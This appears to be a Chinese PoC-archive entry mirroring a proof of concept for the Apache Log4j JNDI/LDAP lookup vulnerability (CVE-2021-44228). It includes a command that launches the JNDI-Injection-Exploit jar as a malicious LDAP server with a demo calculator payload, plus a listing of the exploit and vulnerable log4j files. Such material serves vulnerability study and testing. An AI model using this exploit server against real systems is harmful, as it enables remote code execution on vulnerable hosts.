关联漏洞
描述
Proof of Concept of apache log4j LDAP lookup vulnerability. CVE-2021-44228
介绍
# Apache-Log4j-POC CVE-2021-44228
Proof of Concept of apache log4j LDAP lookup vulnerability
You can read more about the vulnerability here:
https://blog.cloudflare.com/inside-the-log4j2-vulnerability-cve-2021-44228/
How to run the provided ldap server that returns malicious object ?
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"
# Courtesy: https://github.com/welk1n/JNDI-Injection-Exploit
文件快照
[4.0K] /data/pocs/25f0c61d46ee71cf6b7dd8b516efef2632fcd203
├── [9.9M] JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar
├── [ 360] log4j2.xml
├── [130K] log4j-api-2.1.jar
├── [805K] log4j-core-2.1.jar
├── [ 722] log4j.java
└── [ 459] README.md
0 directories, 6 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。